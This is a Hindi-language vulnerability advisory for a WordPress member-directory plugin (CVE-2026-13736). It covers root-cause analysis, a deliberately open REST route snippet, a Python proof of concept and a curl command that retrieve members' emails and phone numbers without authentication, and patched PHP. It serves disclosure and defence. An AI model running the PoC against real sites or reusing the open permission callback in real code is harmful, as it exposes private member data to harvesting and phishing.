
एक WordPress REST API डायरेक्टरी प्लगइन में अनप्रमाणित सदस्य की PII (व्यक्तिगत पहचान योग्य जानकारी) के प्रकटीकरण हेतु प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट और तकनीकी एडवाइज़री, जिसमें मूल-कारण विश्लेषण, PoC कोड और निवारण मार्गदर्शन शामिल है।
CVE-2026-13736, NewPath WildApricotPress Add-on – Member Directory वर्डप्रेस प्लगइन के संस्करण 1.0.0 और उससे पहले के संस्करणों को प्रभावित करने वाली एक बिना प्रमाणीकरण वाली सदस्य PII प्रकटीकरण भेद्यता है, जिसे साइबर सुरक्षा शोधकर्ता Huynh Kien Minh (MinhHK) ने खोजा और विश्लेषित किया। यह दोष प्लगइन के कस्टम WordPress REST API रूटिंग आर्किटेक्चर में निहित है, जहाँ सदस्य निर्देशिका एंडपॉइंट प्रतिबंधित फ़ील्ड पर गोपनीयता पहुँच नियंत्रण लागू करने में विफल रहते हैं। परिणामस्वरूप, बिना प्रमाणीकरण के दूरस्थ आगंतुक सार्वजनिक REST रूट को क्वेरी करके गोपनीय सदस्य डेटा एकत्र कर सकते हैं, जिसमें निजी ईमेल पते, व्यक्तिगत फ़ोन नंबर, और सदस्यता निर्देशिका विशेषताएँ शामिल हैं जिन्हें स्पष्ट रूप से केवल-सदस्यों के लिए कॉन्फ़िगर किया गया था। संवेदनशील डेटा का यह प्रकटीकरण अपेक्षित गोपनीयता सीमाओं का उल्लंघन करता है और प्रभावित संगठनों में लक्षित फ़िशिंग, क्रेडेंशियल स्टफिंग, और अनधिकृत प्रोफाइलिंग को सक्षम बनाता है। सुरक्षा शोधकर्ता Huynh Kien Minh ने इस भेद्यता को CVSS 3.1 स्कोर 5.3 मध्यम (CWE-284 / CWE-200) के तहत सत्यापित किया, और तत्काल REST एंडपॉइंट अनुमति सख्तीकरण, फ़ील्ड-स्तरीय गोपनीयता सत्यापन, तथा क्रमबद्ध JSON सदस्य API प्रतिक्रियाओं के शुद्धिकरण की सिफारिश की।
त्वरित लिंक: शोधकर्ता के आधिकारिक साइबर सुरक्षा पोर्टफोलियो को देखें या आधिकारिक WPScan एडवाइज़री देखें।
| पैरामीटर | तकनीकी विनिर्देश |
|---|---|
| भेद्यता पहचानकर्ता | CVE-2026-13736 |
| लक्ष्य सॉफ़्टवेयर | NewPath WildApricotPress Add-on – Member Directory (वर्डप्रेस प्लगइन) |
| प्लगइन स्लग | newpath-wildapricotpress-add-on-member-directory |
| संवेदनशील संस्करण | <= 1.0.0 |
| भेद्यता वर्ग | अनुचित पहुँच नियंत्रण / सूचना प्रकटीकरण (CWE-284 / CWE-200 / CWE-862) |
| CVSS v3.1 स्कोर | 5.3 (मध्यम) (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |
| खोजकर्ता / शोधकर्ता | Huynh Kien Minh (MinhHK) |
| सत्यापन प्राधिकरण | WPScan / MITRE Corporation / NVD |
| WPScan एडवाइज़री संदर्भ | WPScan Report 97fe9780-ad69-4f36-9496-5ca9c0e2bc39 |
| NVD संदर्भ | NVD CVE-2026-13736 Detail |
| Feedly खतरा खुफिया जानकारी | Feedly CVE-2026-13736 Hub |
| शोधकर्ता पोर्टफोलियो | https://minhhk.web.app/ |
CVE-2026-13736 का मूल कारण प्लगइन के REST API कंट्रोलर कार्यान्वयन में निहित है। प्लगइन सदस्यता निर्देशिकाओं और संपर्क कार्ड के क्लाइंट-साइड रेंडरिंग की सुविधा के लिए एक सार्वजनिक WordPress REST API रूट (जैसे, /wp-json/wildapricot/v1/members या /wp-json/newpath-wap/v1/directory) पंजीकृत करता है।
// Insecure REST route registration without field privacy filters
add_action( 'rest_api_init', function() {
register_rest_route( 'newpath-wap/v1', '/directory', array(
'methods' => WP_REST_Server::READABLE,
'callback' => 'newpath_wap_get_member_directory',
'permission_callback' => '__return_true', // CRITICAL: Open to unauthenticated visitors
) );
} );
function newpath_wap_get_member_directory( $request ) {
$members_data = get_wildapricot_cached_members();
// FLAW: Returns raw member objects containing sensitive PII fields (email, phone, address)
// without evaluating member-level privacy settings (e.g., 'MembersOnly' vs 'Public')
return rest_ensure_response( $members_data );
}
'permission_callback' => '__return_true' घोषित करता है, जो किसी भी स्रोत से बिना प्रमाणीकरण के HTTP GET अनुरोधों की अनुमति देता है।नैतिक अस्वीकरण: यह प्रूफ-ऑफ-कॉन्सेप्ट सुरक्षा शोधकर्ता Huynh Kien Minh द्वारा केवल भेद्यता सत्यापन, रक्षात्मक अनुसंधान, और जिम्मेदार प्रकटीकरण के लिए प्रदान किया गया है।
poc_cve_2026_13736.py)#!/usr/bin/env python3
"""
CVE-2026-13736: NewPath WildApricotPress Add-on – Member Directory PII Disclosure PoC
Author: Huynh Kien Minh (MinhHK)
Portfolio: https://minhhk.web.app/
"""
import requests
import json
import sys
TARGET_URL = "http://target-wordpress.local"
REST_ENDPOINT = f"{TARGET_URL}/wp-json/newpath-wap/v1/directory"
def verify_vulnerability(target_url):
print(f"[*] Auditing Target: {target_url}")
print(f"[*] Querying REST Endpoint: {REST_ENDPOINT}")
headers = {
"User-Agent": "Mozilla/5.0 (Security Audit; CVE-2026-13736 Verification)",
"Accept": "application/json"
}
try:
response = requests.get(REST_ENDPOINT, headers=headers, timeout=10)
if response.status_code == 200:
data = response.json()
if isinstance(data, list) and len(data) > 0:
sample_record = data[0]
pii_fields = [k for k in ['email', 'phone', 'mobile', 'address', 'MemberId'] if k in str(sample_record).lower()]
print(f"[!] VULNERABLE: Unauthenticated REST route exposed {len(data)} member records!")
print(f"[!] Sensitive PII attributes exposed: {pii_fields}")
print(f"[*] Sample Record Excerpt: {json.dumps(sample_record, indent=2)[:300]}...\n")
return True
else:
print("[-] Endpoint responded with empty data.")
elif response.status_code in [401, 403]:
print("[+] Endpoint requires authentication (Protected/Patched).")
else:
print(f"[-] Received HTTP status: {response.status_code}")
except requests.RequestException as e:
print(f"[-] Connection failed: {e}")
return False
if __name__ == "__main__":
target = sys.argv[1] if len(sys.argv) > 1 else TARGET_URL
verify_vulnerability(target)
curl -s -X GET "http://target-wordpress.local/wp-json/newpath-wap/v1/directory" \
-H "Accept: application/json" | jq '.[0] | {Name: .name, Email: .email, Phone: .phone, PrivacySetting: .field_privacy}'
NewPath WildApricotPress Add-on – Member Directory को नवीनतम पैच किए गए संस्करण (> 1.0.0) में अपग्रेड करें।प्रतिक्रिया क्रमबद्धता के दौरान फ़ील्ड-स्तरीय गोपनीयता जाँच लागू करें:
function newpath_wap_get_member_directory( $request ) {
$is_logged_in = is_user_logged_in();
$raw_members = get_wildapricot_cached_members();
$sanitized = array();
foreach ( $raw_members as $member ) {
$member_card = array(
'id' => intval( $member['Id'] ),
'name' => sanitize_text_field( $member['DisplayName'] ),
);
// Enforce Members-Only field protection
if ( $is_logged_in || 'Public' === $member['EmailPrivacy'] ) {
$member_card['email'] = sanitize_email( $member['Email'] );
}
if ( $is_logged_in || 'Public' === $member['PhonePrivacy'] ) {
$member_card['phone'] = sanitize_text_field( $member['Phone'] );
}
$sanitized[] = $member_card;
}
return rest_ensure_response( $sanitized );
}
Huynh Kien Minh (MinhHK) एक सूचना सुरक्षा शोधकर्ता और सॉफ़्टवेयर इंजीनियर हैं, जो WordPress कोर और प्लगइन ऑडिटिंग, REST API भेद्यता आकलन, और वैश्विक ओपन-सोर्स पारिस्थितिकी तंत्र में जिम्मेदार प्रकटीकरण में विशेषज्ञता रखते हैं।
{
"@context": "https://schema.org",
"@type": "TechArticle",
"headline": "CVE-2026-13736: NewPath WildApricotPress Add-on – Member Directory <= 1.0.0 Unauthenticated Member PII Disclosure",
"name": "CVE-2026-13736 Security Advisory",
"author": {
"@type": "Person",
"name": "Huynh Kien Minh",
"alternateName": "MinhHK",
"url": "https://minhhk.web.app/"
},
"datePublished": "2026-08-22",
"description": "Deep-dive technical security advisory by Huynh Kien Minh analyzing CVE-2026-13736 in NewPath WildApricotPress Add-on – Member Directory WordPress plugin.",
"about": {
"@type": "SoftwareApplication",
"name": "NewPath WildApricotPress Add-on – Member Directory",
"operatingSystem": "WordPress"
},
"identifier": "CVE-2026-13736"
}